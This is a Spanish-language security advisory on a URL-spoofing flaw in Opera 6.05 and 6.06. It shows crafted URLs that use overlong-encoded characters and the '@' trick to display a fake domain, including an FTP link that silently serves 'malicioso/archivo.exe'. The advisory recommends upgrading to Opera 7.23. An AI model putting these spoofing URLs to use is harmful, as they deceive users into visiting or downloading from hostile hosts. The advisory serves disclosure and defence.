http://www.falso.com%C0%80@www.real.com/

en realidad accede al sitio "http://www.real.com/" pero muestra "http://www.falso.com" en la barra de direcciones.

Sin embargo, cómo ya se indicaba en el artículo mencionado antes, Opera 6 muestra un cuadro de diálogo con una advertencia, antes de ir a una URL que contiene un nombre de usuario, de modo que se puede ver el nombre real del servidor en HTTP/HTTPS.

Pero esto no ocurre si se utiliza un URL que apunte a un FTP. En ese caso, no aparece la ventana de advertencia, y no se puede visualizar la información real del dominio al que se accederá.

Ejemplos para Opera 6:

Ejemplo 1 (HTTP)

Al ingresar a este URL (lo siguiente va en una sola línea):

http://www.falso.com%C0%AFcamino%C0%AF
nombre%C0%AEhtml%C0%80@www.opera.com/

La barra de direcciones muestra:

http://www.falso.com/camino/nombre.html

Pero en realidad estamos viendo la página:

http://www.opera.com/

Ejemplo 2 (FTP)

En el caso de ingresar a una dirección tipo "FTP" (va en una sola línea):

ftp://ftp.falso.com%C0%AFcamino%C0%AFarchivo%C0%AEexe
%C0%80:password@malicioso/archivo.exe

Sin ninguna advertencia previa, al contrario de lo que ocurría en el ejemplo anterior, nos muestra lo siguiente:

ftp://ftp.opera.com/camino/archivo.exe

En realidad no estamos en ese sitio, sino en éste:

malicioso/archivo.exe

De este modo, se podría descargar un archivo diferente.

Son afectados el Opera 6.05 y 6.06 (y posiblemente anteriores).

El Opera 7.23 es inmune a este fallo.


Recomendaciones:

Actualizarse a Opera 7.23:
http://www.opera.com/download/index.dml?opsys=
Windows&platform=Windows&lng=es


Relacionados

Falsificación de URL en Internet Explorer: Alto Riesgo
http://www.vsantivirus.com/vul-arroba3.htm


Publicado en:
http://www.securityfocus.com/archive/1/348275




(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com